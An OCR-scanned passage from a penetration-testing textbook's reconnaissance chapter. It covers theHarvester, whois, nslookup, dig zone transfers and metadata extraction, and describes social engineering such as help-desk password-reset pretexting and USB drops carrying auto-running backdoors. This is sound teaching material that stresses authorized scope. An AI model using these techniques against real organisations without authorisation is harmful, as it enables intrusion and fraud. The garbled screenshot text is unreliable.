1898you. Many search engines also employ throttling techniques that will attempt
1899to prevent you from running automated searches.
1900
1901The Harvester can be used to search Google, Bing, and PGP servers for e-mails,
1902hosts, and subdomains. It can also search Linkedln for user names. Most peo-
1903ple assume their e-mail address is benign. We have already discussed the dan-
1904gers of posting to public forums using your corporate e-mail address; however,
1905there are additional hazards you should be aware of. Let us assume during your
1906reconnaissance you discover the e-mail address of an employee from your tar-
1907get organization. By twisting and manipulating the information before the "@"
1908symbol, we should be able to create a series of potential network usernames.
1909It is not uncommon for organizations to use the exact same user names and
1910e-mail addresses (before the "@" symbol). With a handful of prospective user-
1911names, we can attempt to brute force our way into any services, like SSH, VPNs,
1912or FTP, that we (will) discover during the next step 2 (scanning).
1913
1914The Harvester is built into Backtrack. To access the Harvester, use the following
1915steps:
1916
19171. Click on the KStart dragon, located in the lower left corner of your screen.
1918
19192. Highlight "Backtrack" at the top of the menu.
1920
1921
1922
1923Reconnaissance CHAPTER 2
1924
1925
1926
1927c \
1928
1929
1930
1931ADDITIONAL RESOURCES
1932
1933
1934
1935If you are using an operating system other than Backtrack, you can download the tool
1936directly from Edge Security at: http://www.edge-security.com. Once you have got it
1937downloaded, you can unpack the downloaded tar file by running the following command
1938in a terminal:
1939
1940tar xf theHarvester
1941
1942Please note the capital "H" that is used when untarring the code. Linux is case
1943sensitive, so the operating system sees a difference between "theHarvester" and
1944"theharvester." You will need to pay attention to the executable to determine if you
1945should use a capital or lowercase "h." If the cases do not match exactly, you will
1946typically get a message saying "no such file or directory." This is a good indication that
1947you have mistyped the name of the file.
1948V )
1949
1950
1951
19523. Highlight "Information Gathering."
1953
19544. Highlight "All."
1955
19565. Select "TheHarvester" (note, tools are listed in alphabetical order).
1957
1958You can also open a terminal window and navigate to the Harvester directory
1959by issuing the following command:
1960
1961cd /pen test /en ume rati on/google/theharvester
1962
1963Regardless of whether you have downloaded the Harvester or used the ver-
1964sion installed in Backtrack, we will use it to collect additional information
1965about our target. Be sure you are in theHarvester folder and run the following
1966command:
1967
1968. /theHa rves ter . py -d syngress.com -1 10 -b google
1969
1970This command will search for e-mails, subdomains, and hosts that belong to
1971syngress.com. Figure 2.3 shows our results.
1972
1973Before discussing the results of our tool, let us examine the command a little
1974closer. ". /theHarvester. py" is used to invoke the tool. A lowercase "-d" is
1975used to specify the target domain. A lowercase "1 " (that is an L not a 1) is
1976used to limit the number of results returned to us. In this case, the tool was
1977instructed to return only 10 results. The " b" is used to specify what public
1978repository we want to search. We can choose among Google, Bing, PGP, or
1979Linkedln — for this example, we chose to search using Google.
1980
1981Now that you fully understand the command that was run, let us take a look at
1982the results.
1983
1984As you can see, the Harvester was effective in locating at least two e-mail
1985addresses that could be of value to us. Please note, the e-mail addresses in the
1986screenshot have been circled and obfuscated. The Harvester was also successful
1987
1988
1989
1990The Basics of Hacking and Penetration Testing
1991
1992
1993
1994ration/goflql* ft 1***1* rwi t « r - Shi SI - Kenieto
1995
1996
1997
1998itil\Qtt Edit Vitfw Boekmarfcv Stttingj Hdp
1999
2000
2001
2002rootpbt:/* cd /p*nt tit/tnwrit ion /o;ooo:Wlhthjrv*s(ir7
2003
2004ro«t^bt£/p«nt*>t/mimr«ti«n/QoogU/thah4ry«)t«i# ,/th*H*rvt»L«r ,py tyngi'tti.CQ* -b 9009.1*
2005
2006
2007
2008•Tlt*HArv»it*r V*r. 1.6
2009'Coded by Christian Hirtorcllt
2010■Edqv- Security R*t«4rtft
2011-(Mr toreU^cdfi' security
2012
2013
2014
2015S**rchiAg for syngrtsi.CM in <joog\c
2016
2017
2018
2019Accounts found:
2020
2021
2022
2023SolulJ Ons^syngrcs V . CO*
2024
2025www . Mlut iont4iyngr*it . coa
2026
2027
2028
2029
2030Total r#iul(s: ft
2031Hosts found:
2032
2033
2034
2035WMf.SyAff****C4fl
2036bOOkl It* . tyrtfl hW . £*»
2037, syngrojs , CO*
2038cbook www.syrtfress.co*
2039
2040rooi#bt:/p*M9f t/triu*er»t lOrt/joc^lc/tMMfxJUrr* |
2041
2042
2043
2044FIGURE 2.3
2045
2046Output of the Harvester.
2047
2048
2049
2050in finding at least two additional subdomains. Both "booksite.syngress.com"
2051and "ebook_www.syngress.com" need to be fully recon'd. We simply add these
2052new domains to our target list and begin the reconnaissance process again.
2053
2054Step 1 of reconnaissance is very cyclical because in-depth reconnaissance often
2055leads to the discovery of new targets, which, in turn, leads to additional recon-
2056naissance. As a result, the amount of time to complete this phase will vary
2057from several hours to several weeks. Remember, a determined malicious hacker
2058understands not only the power of good reconnaissance but also that of a
2059nearly limitless amount of time. As an aspiring penetration tester, you should
2060devote as much time as possible to practicing and conducting information
2061gathering.
2062
2063WHOIS
2064
2065A very simple but effective means for collecting additional information about
2066our target is Whois. The Whois service allows us to access specific information
2067about our target including the IP addresses or host names of the company's
2068Domain Name Systems (DNS) servers and contact information usually con-
2069taining an address and phone number.
2070
2071Whois is built into the Linux operating system. The simplest way to use this
2072service is to open a terminal and enter the following command:
2073
2074whois ta rget_doma i n
2075
2076
2077
2078Reconnaissance CHAPTER 2
2079
2080
2081
2082root<§bt:
2083
2084
2085- â– shall
2086
2087
2088Konsola " y
2089
2090
2091Session Edit View Bookmarks
2092
2093
2094Settings
2095
2096
2097Help
2098
2099
2100
2101root@bt;-# whois syngresj -con
2102Whois Server Version 2,0
2103
2104Domain names in the .con and .net domains can now be registered
2105with many different competing registrar*. Go to rittp://www.internic l
2106for detailed information*
2107
2108Domain Hame: syngRess.com
2109Registrar: SAFENAHES LTD
2110Whois Server: whois.5afenai7ies.net
2111Referral URL: http://www.safenames.net
2112Name Server; HSl.DREAflH0ST.COM
2113Name Server: NS2 . DREAHHQST . COM
2114Name server: HS3.OREW1H0ST.COH
2115Status; ok
2116
2117Updated Date: sep-ZOG**
2118Creation Date: lG-sep-19v7
2119Expiration Date: 99-sep~2&15
2120
2121^» Last update of whois database: Sun, 14 Nov 2010 19:20-35 UK
2122
2123
2124
2125FIGURE 2.4
2126
2127Partial Output from a Whois Query.
2128
2129
2130
2131Whois.Net
2132
2133DOHA IN â– BASED RESEARCH SERVICES
2134
2135WP»H aomadn name loo*. up, available ttomaln rwrm,
2136
2137
2138
2139keyword u-vtft, dtleted domtini: Log-- i
2140
2141
2142
2143Whote dftmakn n*m* lookup,, ivtbbl* domain itihiii, domain
2144
2145
2146
2147WHOIS Lookup jvpq»(m ; com CCoQ
2148
2149
2150
2151E x p4j n a t Ion of T oofc
2152
2153
2154
2155lOflkwp rf unl'/itu-.f. Oil J
2156
2157
2158
2159Domain t-OOKUfi
2160
2161
2162
2163j -CO<Vi -{^ ( QO* ^ NM«»ll*Ui domibu
2164
2165
2166
2167FIGURE 2.5
2168
2169Whois.net — A Web-Based Lookup Tool.
2170
2171
2172
2173For example, to find out information about Syngress, we would issue the fol-
2174lowing command: "whois syngress.com." Figure 2.4 shows a partial output
2175from the result of this tool.
2176
2177It is important to record all the information and pay special attention to the
2178DNS servers. If the DNS servers are listed by name only as shown in Figure
21792.4, we will use the Host command to translate those names into IP addresses.
2180We will discuss the host command in the next section. You can also use a web
2181browser to search Whois. By navigating to http://www.whois.net, you can
2182search for your target in the "WHOIS Lookup" box as shown in Figure 2.5.
2183
2184Again it is important to closely review the information you are presented with.
2185Sometimes, the output will not provide many details. We can often access
2186these additional details by querying the specific whois server listed in the out-
2187put of our original search. Figure 2.6 shows an example of this.
2188
2189
2190
2191The Basics of Hacking and Penetration Testing
2192
2193
2194
2195WHOIS information for syngress.com :
2196
2197J Querying wtvoi*. veritlgn-^rt.ccal
2198[ vhol a * vor 1* igri -gxfl i coat
2199
2200Whois Server Veraloa 2,0
2201
2202
2203
2204DdbiI.1 naaes In the .coa and .twit denaliu can now bo registered
2205
2206vicn n*ny dlfrarant coapatlng regiitran. Co to httpi//wv.inc«rnic.net.
2207
2208(or detailed information.
2209
2210
2211
2212Dauln Hue: firSGMfSS . COH
2213
2214la Server: vtiois.fiafcnaaafi.net
2215Referral URLt httpi/Vvvv.fiefanaMi.
2216
2217i ' ' i V T 'i "In i
2218Kudo Server; HS2.OMMtHOS7.COH
2219Nine Server: H& 3 . DR.EAXHOST . COM
2220Sutaii
2221
2222updated Datai 23-aep-2ao9
2223Creation Datet lo-»cp-l997
2224Expiration Datet QJ-icp-2013
2225
2226
2227
2228FIGURE 2.6
2229
2230Whois Output Showing Where to Go for Additional Details.
2231
2232
2233
2234We can conduct a further whois search by following the link provided in the
2235"Referral URL:" field. You may have to search the webpage for a link to their
2236Whois service. By using Safename's whois service, we can extract a significantly
2237larger amount of information as shown here:
2238
2239The Registry database contains ONLY .COM, .NET, . E DU domains and
2240Re gistrars. [whois.safenames.net]
2241Safenames Whois Server Version 2.0
2242
2243
2244
2245Domain Name: SYNGRESS.COM
2246
2247
2248
2249[REGISTRANT]
2250
2251Organisation Name:
2252Contact Name:
2253Address Line 1:
2254Address Line 2:
2255Ci ty /Town :
2256State/Province:
2257Zi p/Postcode :
2258Country :
2259Tel ephone :
2260Fax :
2261Emai 1 :
2262
2263
2264
2265Elsevier Ltd
2266
2267Domain Manager
2268
2269The Boulevard
2270
2271Langford Lane, Kidlington
2272
2273Oxf ordshi re
2274
22750X5 1GB
2276UK
2277
2278+ 44 (18658) 43830
2279+44 (18658) 53333
2280domai nsupport@el sevi er . com
2281
2282
2283
2284[ADMIN]
2285
2286Organisation Name:
2287Contact Name:
2288Address Line 1:
2289Address Line 2:
2290Ci ty /Town :
2291State/Province:
2292Zi p/Postcode :
2293Country :
2294Tel ephone :
2295Fax :
2296Emai 1 :
2297
2298
2299
2300Safenames Ltd
2301International
2302PO Box 5085
2303
2304
2305
2306Domain Administrator
2307
2308
2309
2310Milton Keynes MLO
2311
2312Bucks
2313
2314MK6 3ZE
2315
2316UK
2317
2318+44 (19082) 00022
2319+44 (19083) 25192
2320hostmaster@saf e names .net
2321
2322
2323
2324Reconnaissance CHAPTER 2
2325
2326
2327
2328[TECHNICAL]
2329
2330Organisation Name:
2331Contact Name:
2332Address Line 1:
2333Address Line 2:
2334Ci ty /Town :
2335State/Provi nee :
2336Zi p/Postcode :
2337Country :
2338Telephone:
2339Fax :
2340Emai 1 :
2341
2342
2343
2344+ 44 (19082) 00022
2345+44 (19083) 25192
2346tec@saf enames . net
2347
2348
2349
2350Milton Keynes MLO
2351Bucks
2352
2353
2354
2355MK6 3ZE
2356UK
2357
2358
2359
2360International Domain Tech
2361International Domain Tech
2362P0 Box 5085
2363
2364
2365
2366NETCRAFT
2367
2368
2369
2370Another great source of information is Netcraft. You can visit their site at
2371http://news.netcraft.com. Start by searching for your target in the "What's that
2372site Running?" textbox as shown in Figure 2.7.
2373
2374Netcraft will return any websites it is aware of that contain your search words.
2375In our example we are presented with three sites: syngress.com, www.syngress.
2376com, and booksite.syngress.com. If any of these sites have escaped our previous
2377searches, it is important to add them to our potential target list. The returned
2378results page will allow us to click on a "Site Report." Viewing the site report
2379should provide us with some valuable information as shown in Figure 2.8.
2380
2381As you can see, the site report provides us with some great information about
2382our target including the IP address and OS of the web server as well as the DNS
2383server. Once again all this information should be cataloged and recorded.
2384
2385
2386
2387Oftentimes, our reconnaissance efforts will result in host names rather than IP
2388addresses. When this occurs, we can use the "host" tool to perform a transla-
2389tion for us. The host tool is built into Backtrack. We can access it by opening a
2390terminal and typing:
2391
2392root@bt~# host ta rget_hostname
2393
2394
2395
2396HOST
2397
2398
2399
2400
2401FlETCKAFT
2402
2403
2404
2405
2406FIGURE 2.7
2407
2408Netcraft Search Option.
2409
2410
2411
2412The Basics of Hacking and Penetration Testing
2413
2414
2415
2416
2417
2418Site report for n
2419
2420
2421fnaress.com
2422
2423
2424
2425
2426
2427
2428
2429
2430
2431
2432
2433
2434unknown lad Uptima pnaf
2435
2436
2437
2438
2439..yogr eav.com
2440
2441
2442Netbteek
2443
2444OWMC
2445
2446
2447Hew Dream V.'i « :v u . LLC
2448
2449
2450IP add-rtsi
2451
2452
2453G9.163.177.J
2454
2455
2456Site rank
2457
2458
2459mil
2460
2461
2462Country
2463
2464
2465Qui
2466
2467
2468NlttleHrw
2469
2470
2471nil.drtamheat.ewri
2472
2473
2474Date first
2475Hen
2476
2477
2478Mmtt 2000
2479
2480
2481DNS admin
2482
2483
2484f wt m aslci" h ost .com
2485
2486
2487Oi>m».i"i
2488K.-.j,-.':. ...
2489
2490
2491
2492
2493Bavftrta DNS
2494
2495
2496pll4B7J.drMmhon.COfn
2497
2498
2499
2500
2501i Syngas PtWnriir:g
2502
2503
2504Himenrvcr
2505Or^a Filiation
2506
2507
2508unknown
2509
2510
2511Oh***
2512
2513
2514
2515
2516Hrtcrnn Srtr
2517
2518
2519
2520
2521â– mother ittv
2522
2523
2524!
2525
2526
2527Repot
2528Gadget
2529
2530
2531
2532
2533
2534Hosting History
2535
2536
2537
2538NotMocfc Owner
2539
2540
2541
2542
2543IP •OtilMfl
2544
2545
2546OS
2547
2548
2549Wmb Server
2550
2551
2552Last
2553thonged
2554
2555
2556««w Dream rMvrenc, LIC417 AMoaated mi. PMB7&7 -f
2557US 92*2 1
2558
2559
2560LA
2561
2562
256369.163.177.2
2564
2565
2566Linux
2567
2568
2569Apoene
2570
2571
25721]-Sen-
25737010
2574
2575
2576Ma* Drum Hdwwit LLC 417 At*Od*«d Ad. MB JS7 Br
2577US92B21
2578
2579
2580MCA
2581
2582
2583E9 r tfr3.E77.2
2584
2585
2586max
2587
2588
2589
2590
259124 .F».
2592JO 10
2593
2594
2595New f>a*m NMwofX. LLC 417 Associated Rd. PHD 257 rv
2596US 92« t
2597
2598
2599l-j CA
2600
2601
260269 J63.177.2
2603
2604
2605Unux
2606
2607
2608AE»che
2609
2610
261123-Fee-
26122010
2613
2614
2615
2616FIGURE 2.8
2617
2618Site Report for Syngress.com.
2619
2620
2621
2622
2623FIGURE 2.9
2624
2625Host Command Output.
2626
2627In our previous searches, we uncovered a DNS server with the host name "nsl.
2628dreamhost.com." To translate this into an IP address, we would enter the fol-
2629lowing command in a terminal:
2630
2631host nsl.dreamhost.com
2632Figure 2.9 shows the result of this tool.
2633
2634The host command can also be used in reverse. It can be used to translate IP
2635addresses into host names. To perform this task, simply enter:
2636
2637root@bt~# host IP address
2638
2639Using the " - a " switch will provide you with verbose output and possibly reveal
2640additional information about your target. It is well worth your time to review
2641the "host" documentation and help files. You can do so by issuing the "man
2642host" command in a terminal window. This help file will allow you to become
2643familiar with the various options that can be used to provide additional func-
2644tionality to the "host" tool.
2645
2646EXTRACTING INFORMATION FROM DNS
2647
2648DNS servers are an excellent target for hackers and penetration testers. They
2649usually contain information that is considered highly valuable to attackers.
2650DNS is a core component of both our local networks and the Internet. Among
2651
2652
2653
2654Reconnaissance CHAPTER 2
2655
2656
2657
2658other things, DNS is responsible for the process of translating domain names
2659to IP addresses. As humans, it is much easier for us to remember "google.com"
2660rather than http://74.125.95.105. However, machines prefer the reverse. DNS
2661serves as the middle man to perform this translation process.
2662
2663As penetration testers, it is important to focus on the DNS servers that belong
2664to our target. The reason is simple. In order for DNS to function properly, it
2665needs to be aware of both the IP address and the corresponding domain
2666name of each computer on its network. In terms of reconnaissance, gaining
2667full access to a company's DNS server is like finding a pot of gold at the end
2668of a rainbow. Or maybe, more accurately, it is like finding a blueprint to the
2669organization. But in this case the blueprint contains a full listing of internal
2670IP addresses that belong to our target. Remember one of the key elements of
2671information gathering is to collect IP addresses that belong to the target.
2672
2673Aside from the pot of gold, another reason why picking on DNS is so enjoy-
2674able is that in many cases these servers tend to operate on the "if it isn't broke,
2675don't touch it" principle.
2676
2677Inexperienced network administrators often regard their DNS servers with sus-
2678picion and mistrust. Oftentimes, they choose to ignore the box completely
2679because they do not fully understand it. As a result touching, patching, updat-
2680ing, or changing configurations on the DNS server is often a low priority. Add
2681this to the fact that most DNS servers appear to be very stable (as long as the
2682administrator is not monkeying with it) and you have a recipe for a security
2683disaster. These admins wrongly learn early in their career that the less they
2684mess with their DNS servers, the less trouble it seemed to cause them.
2685
2686As a penetration tester, given the number of misconfigured and unpatched
2687DNS servers that abound today, it is natural to assume that many current net-
2688work admins operate under this same principle.
2689
2690If the above statements are true in even a small number of organizations, we
2691are left with valuable targets that have a high probability of being unpatched
2692or out of date. So the next logical question becomes, how do we access this
2693virtual pot of gold? Before we can begin the process of examining a DNS server,
2694we need an IP address. Earlier in our reconnaissance, we came across several
2695references to DNS. Some of these references were by host names, whereas oth-
2696ers were by IP addresses. Using the host command, we can translate any host
2697names into IP addresses and add these IPs to the potential target list. Again,
2698you must be sure to double- and triple-check that the IP you collect is within
2699your authorized scope before continuing.
2700
2701Now that we have a list of DNS IP addresses that belong to or serve our tar-
2702get we can begin the process of interrogating DNS to extract information.
2703Although it is becoming more rare to find, one of our first tasks when interact-
2704ing with a target DNS is to attempt a zone transfer.
2705
2706Remember DNS servers contain a series of records that match up the IP address
2707and host name for all the devices that the servers are aware of. Many networks
2708
2709
2710
2711The Basics of Hacking and Penetration Testing
2712
2713
2714
2715deploy multiple DNS servers for the sake of redundancy or load balancing. As
2716a result, DNS servers need a way to share information. This "sharing" process
2717occurs through the use of a zone transfer. During a zone transfer, also com-
2718monly referred to as AXFR, one DNS server will send all the host-to-IP map-
2719pings it contains to another DNS server. This process allows multiple DNS
2720servers to stay in sync.
2721
2722Even if we are unsuccessful in performing a zone transfer, we should still spend
2723time investigating any DNS servers that fall within our authorized scope.
2724
2725NS Lookup
2726
2727The first tool we will use to examine DSN is NS Lookup. NS Lookup is a tool
2728that can be used to query DNS servers and potentially obtain records about
2729the various hosts of which it is aware. NS Lookup is built into many versions
2730of Linux including Backtrack and is even available via the Windows command
2731prompt! NS Lookup operates very similarly between the various operating sys-
2732tems; however, you should always review the specifics for your particular sys-
2733tem. You can do so in Linux by reviewing the NS Lookup man pages. This is
2734accomplished by opening a terminal and typing:
2735
2736root@bt~# man nslookup
2737
2738NS Lookup is a tool that can be run in interactive mode. This simply means we
2739will first invoke the program and then feed it the particular switches we need
2740to make it function properly. We begin using NS Lookup by opening a termi-
2741nal and entering:
2742
2743root@bt~# nslookup
2744
2745By issuing the "nslookup" command, we start the NS Lookup tool from the
2746operating system. After typing "nslookup" and hitting enter, your usual "#"
2747prompt will be replaced with a ">" prompt. At this point you can enter the
2748additional information required for NS Lookup to function.
2749
2750We begin feeding commands to NS Lookup by entering the "server" keyword
2751and an IP address of the DNS server you want to query. An example follows:
2752
2753server 8.8.8.8
2754
2755NS Lookup will simply accept the command and present you with another ">"
2756prompt. Next, we specify the type of record we are looking for. During the recon-
2757naissance process, there are many types of records that you may be interested in.
2758For a complete listing of the various DNS record types and their description, you
2759can use your newly acquired Google skills! If you are looking for general infor-
2760mation, you should set the type to any by using the keyword "a ny ":
2761
2762set type = any
2763
2764If you are looking for specific information from the DNS server such as the IP
2765address of the mail server that handles e-mail for the target organization, we
2766would use the "set type 5 mx".
2767
2768
2769
2770Reconnaissance CHAPTER 2
2771
2772
2773
2774root* M; - • SK*M ■Kwwi*
2775
2776
2777
2778Session Edit View Bookmarks Settings Help
2779
2780
2781
2782root@M:-# host nsl .dreamhost .com
2783nsl.dreamhost.com has address 66.33.286.286
2784nsl.dreanihast.com is an alias for nsl.dreamhost.com.
2785nsl. dreamhost. com has address 66.33.286.286
2786nsl.dreamhost.com is an alias for nsl.dreamhost.com.
2787nsl.dreamhost.com has address 66.33.286.286
2788root@bt;-# ns lookup
2789
2790> server 66.33.286.286
2791Default server: 66.33.266.2S6
2792Address: 66.33.286.206*53
2793
2794> set type=mx
2795
2796> syngress.com
2797
2798Server: 66.33.296.266
2799Address: 66.33.296.206*53
2800
2801
2802
2803syngress.com mail exchanger
2804
2805
2806
2807FIGURE 2.10
2808
2809Using Host and NS Lookup to Determine the E-mail Server of Our Target.
2810
2811
2812
2813We wrap up our initial DNS interrogation with NS Lookup by entering the tar-
2814get domain after the next ">" prompt.
2815
2816Suppose you wanted to know what mail server is used to handle the e-mail for
2817Syngress. In a previous example, we determined that one of Syngress's name
2818servers was "nsl.dreamhost.com". Here again we can use the host tool to
2819quickly determine what IP address is associated with nsl.dreamhost.com. With
2820this information in hand, we can use NS Lookup to query DNS and find mail
2821server for Syngress. Figure 2.10 shows an example of this process; the name of
2822the e-mail server has been highlighted (in the bottom right of the screenshot)
2823and now needs to be added to our potential target list.
2824
2825Dig
2826
2827Another great tool for extracting information from DNS is "dig." To work with
2828dig, we simply open a terminal and enter the following command:
2829
2830dig @target_ip
2831
2832Naturally, you will need to replace the "target_ip" with the actual IP
2833address of your target. Among other things, dig makes it very simple to
2834attempt a zone transfer. Recall that a zone transfer is used to pull multiple
2835records from a DNS server. In some cases, a zone transfer can result in the tar-
2836get DNS server sending all the records it contains. This is especially valuable if
2837your target does not distinguish between internal and external IPs when con-
2838ducting a zone transfer. We can attempt a zone transfer with dig by using the
2839"-t AXFR" switch.
2840
2841If we wanted to attempt a zone transfer against a fictitious DNS server with an
2842IP address of 192.168.1.23 and a domain name of "example.com" we would
2843issue the following command in a terminal window:
2844
2845dig 0192.168.1.23 example.com -t AXFR
2846
2847
2848
2849The Basics of Hacking and Penetration Testing
2850
2851
2852
2853If zone transfers are allowed and not restricted, you will be presented with a
2854listing of host and IP addresses from the target DNS server that relate to your
2855target domain.
2856
2857Backtrack has many additional tools that can be used to interact with DNS.
2858These tools should be explored and utilized once you have a solid understand-
2859ing of how DNS works. Please see the end of this chapter for a brief discussion
2860of some additional tools you may want to use when conducting a penetration
2861test involving DNS.
2862
2863EXTRACTING INFORMATION FROM E-MAIL SERVERS
2864
2865E-mail servers can provide a wealth of information for hackers and penetration
2866testers. In many ways, e-mail is like a revolving door to your target's organiza-
2867tion. Assuming your target is hosting their own e-mail server, this is often a
2868great place to attack. It is important to remember, "You can't block what you
2869must let in." In other words, for e-mail to function properly, external traffic
2870must pass through your border devices like routers and firewalls, to an internal
2871machine, typically somewhere inside your protected networks.
2872
2873As a result of this, we can often gather significant pieces of information by
2874interacting directly with the e-mail sever. One of the first things to do when
2875attempting to recon an e-mail server is to send an e-mail to the organization
2876with an empty .bat file or a nonmalicious .exe file like calc.exe. In this case, the
2877goal is to send a message to the target e-mail server inside the organization in
2878the hope of having the e-mail server inspect, and then reject the message.
2879
2880Once the rejected message is returned back to us, we can attempt to extract
2881information about the target e-mail server. In many cases, the body of the
2882message will include a precanned write-up explaining that the server does
2883not accept e-mails with potentially dangerous extensions. This message often
2884indicates the specific vendor and version of antivirus that was used to scan the
2885e-mail. As an attacker this is a great piece of information to have.
2886
2887Having a return message from a target e-mail server also allows us to inspect
2888the headers of the e-mail. Inspecting the Internet headers will often allow us to
2889extract some basic information about the e-mail server, including IP addresses
2890and the specific software versions or brand of e-mail server running. Knowing
2891the IP address and software versions can be incredibly useful when we move
2892into the exploitation phase (step 3).
2893
2894MetaGooFil
2895
2896Another excellent information gathering tools is "MetaGooFil." MetaGooFil is
2897a metadata extraction tool that is written by the same folks who brought us
2898the Harvester. Metadata is often defined as data about data. When you create a
2899document like Microsoft Word or a PowerPoint presentation, additional data
2900is created and stored within your file. This data often includes various pieces of
2901information that describe the document including the file name, the file size,
2902
2903
2904
2905Reconnaissance CHAPTER 2
2906
2907
2908
2909the file owner or username of the person who created the file, and the location
2910or path where the file was saved. This process occurs automatically without any
2911user input or interaction.
2912
2913The ability of an attacker to read this information may present some unique
2914insights into the target organization including usernames, system names, files
2915shares, and other goodies. MetaGooFil is a tool that scours the Internet look-
2916ing for documents that belong to your target. After finding these documents,
2917MetaGooFil downloads them and attempts to extract useful metadata.
2918
2919MetaGooFil is built into Backtrack and can be found by navigating to the
2920Information Gathering section off of the Backtrack option in the All Programs
2921menu. Likewise, you can open a terminal window and enter the following
2922command:
2923
2924cd /pentest/enumeration/google/metagoofil
2925
2926After navigating to the MetaGooFil directory, it is a good idea to create a
2927"files" folder. The purpose of this folder is to hold all the target files that will
2928be downloaded; this keeps the original directory clean. You can create a new
2929folder by entering:
2930
2931mkdi r fil es
2932
2933With this directory setup, you can run MetaGooFil by issuing the following
2934command:
2935
2936. /metagoofll . py -d syngress.com -f all -o results -t files
2937
2938Let us examine the details of this command, "./metagoofll .py" is used to
2939invoke the MetaGooFil python script. Do not forget to put the "J" in front
2940of the command. The "d" switch is used to specify the target domain to be
2941searched. The "-f " switch is used to specify which type or types of files you want
2942MetaGooFil to attempt to locate. Utilizing the "all" switch will force MetaGooFil
2943to locate and download all the different format types that it can process includ-
2944ing ppt, pdf, xls, odp, docx and others. You can also specify individual file types
2945to limit the returned results. We use the " o" switch to specify the name of the
2946report that MetaGooFil will generate for us. Lastly we specify the folder where we
2947want to store each of the files that MetaGooFil locates and downloads. In an ear-
2948lier step we created a "fil es" directory; as a result, our command " f fil es" will
2949save each of the discovered documents into this folder.
2950
2951While the output from MetaGooFil against Syngress reveals nothing, below
2952you will find a sample of the tool's output from a recent penetration test that
2953clearly provides additional value and should be included with our reconnais-
2954sance data.
2955
2956C:\Documents and Setti ngs\denni si \My Documents\
2957
2958This example is rich with information. First, it provides us with a valid net-
2959work username "dennisl." Second, it clearly shows that Dennis uses a Windows
2960machine.
2961
2962
2963
2964The Basics of Hacking and Penetration Testing
2965
2966
2967
2968SOCIAL ENGINEERING
2969
2970No discussion of reconnaissance would be complete without including social
2971engineering. Many people would argue that social engineering is one of the
2972most simple and effective means for gathering information about a target.
2973
2974Social engineering is the process of exploiting the "human" weakness that is
2975inherent in every organization. When utilizing social engineering, the attacker's
2976goal is to get an employee to divulge some information that should be kept
2977confidential.
2978
2979Let us assume you are conducting a penetration test on an organization.
2980During your early reconnaissance, you discover an e-mail address for one of
2981the company's sales people. You understand that sales people are highly likely
2982to return product inquiry e-mails. As a result, you sent an e-mail from an anon-
2983ymous address feigning interest in a particular product. In reality, you did not
2984care about the product. The real purpose of sending the e-mail is to get a reply
2985from the sales person so you can review the e-mail headers contained in the
2986response. This process will allow you to gather additional information about
2987the company's internal e-mail servers.
2988
2989Let us take our social engineering example one step further. Suppose our sales-
2990man's name is Ben Owned (we found this information during our reconnais-
2991sance of the company website and in the signature of his e-mail response).
2992Let us assume that in this example, when you sent the employee the product
2993inquiry e-mail, you received an automatic reply with the notification that Ben
2994Owned was "currently out of the office travelling overseas" and "would be
2995gone for two weeks with only limited e-mail access."
2996
2997A classic example of social engineering would be to impersonate Ben Owned
2998and call the target company's tech support number asking for help resetting
2999your password because you are overseas and cannot access your webmail. If
3000you are lucky, the tech support people will believe your story and reset the
3001password. Assuming they use the same password, you now have access to Ben
3002Owned's e-mail and other network resources like VPN for remote access, or
3003FTP for uploading sales figures and customer orders.
3004
3005Social engineering, like reconnaissance in general, takes both time and prac-
3006tice. Not everyone makes a good social engineer. In order to be successful, you
3007must be supremely confident, knowledgeable of the situation, and flexible
3008enough to go "off script." If you are conducting social engineering over the
3009phone, it can be extremely helpful to have detailed and well-written notes in
3010case you are asked about some obscure detail.
3011
3012Another example of social engineering is to leave USB thumb drives or CDs at
3013the target organization. The thumb drives should be distributed to several loca-
3014tions in or near the organization. The parking lot, the lobby, the bathroom,
3015and an employee's desk are all great "drop" locations. It is human nature for
3016most people to insert the thumb drive or CD into their PC just to see what is
3017
3018
3019
3020Reconnaissance CHAPTER 2
3021
3022
3023
3024on the drive. In this example though, the thumb drive or CD is preloaded with
3025a self-executing backdoor program that automatically launches when the drive
3026is inserted into the computer. The backdoor is capable of bypassing the com-
3027pany firewall and will dial home to the attacker's computer, leaving the target
3028exposed and giving the attacker a clear channel into the organization. We will
3029discuss the topic of backdoors in Chapter 6.
3030
3031SIFTING THROUGH THE INTEL TO FIND ATTACKABLE
3032TARGETS
3033
3034Once you have completed the steps above, you need to schedule some time
3035to closely review all the reconnaissance and information you have gathered.
3036In most cases, even light reconnaissance should produce a mountain of data.
3037Once the reconnaissance step is completed, you should have a solid under-
3038standing of your target including the organization, structure, and even technol-
3039ogies deployed inside the company.
3040
3041While conducting the review process, it is a good idea to create a single list that
3042can be used as a central repository for recording IP addresses. You should also
3043keep separate lists that are dedicated to e-mail addresses, host names, and URLs.
3044
3045Unfortunately, most of the data you collected will not be directly attackable.
3046During the process of reviewing your findings, be sure to transform any rele-
3047vant, non-IP-based information, into an IP address. Using Google and the host
3048command you should be able to extract additional IPs that relate to your tar-
3049get. Add these to the IP list.
3050
3051After we have thoroughly reviewed the collected reconnaissance and trans-
3052formed the data into attackable targets, we should have a list of IPs that
3053either belong to, serve, or are related to the target. As always, it is important
3054to remember your authorized scope because not all the IPs we collect will be
3055within that range. As a result, the final step in reconnaissance is to review the
3056IP list you just created and either contact the company to determine if you can
3057increase the scope of the pen test or remove the IP address from your list.
3058
3059At this point you will be left with a list of IP addresses that you are authorized
3060to attack. Do not discard or underestimate all the nonattackable information
3061you have gathered. In each of the remaining steps, we will be reviewing and
3062extracting information from step 1 .
3063
3064HOW DO I PRACTICE THIS STEP?
3065
3066Now that you have a solid understanding of the basic tools and techniques
3067used to conduct reconnaissance, you will need to practice everything that was
3068covered. There are many ways to go about practicing this step. One simple and
3069effective idea is to make a list of companies by reading a newspaper. If you do
3070not have access to a newspaper, any popular news website will do, like www.
3071cnn.com, www.msnbc.com, etc.
3072
3073
3074
3075The Basics of Hacking and Penetration Testing
3076
3077
3078
3079While making a list of potential targets to conduct reconnaissance on, try to
3080focus on company names that you have not heard of before. Any good news-
3081paper or website should contain dozens of companies that you are unfamil-
3082iar with. One note of caution here, YOU MUST BE SURE NOT TO DO ANY
3083ACTIVE RECONNAISSANCE! Obviously, you have not been authorized in any
3084way to perform the active techniques we covered in this chapter. However, you
3085can still practice gathering information through the passive techniques we dis-
3086cussed. This will allow you to refine and sharpen your skills. It will also pro-
3087vide you with an opportunity to develop a system for cataloging, organizing,
3088and reviewing the data you collect. Remember, while this may be the "least"
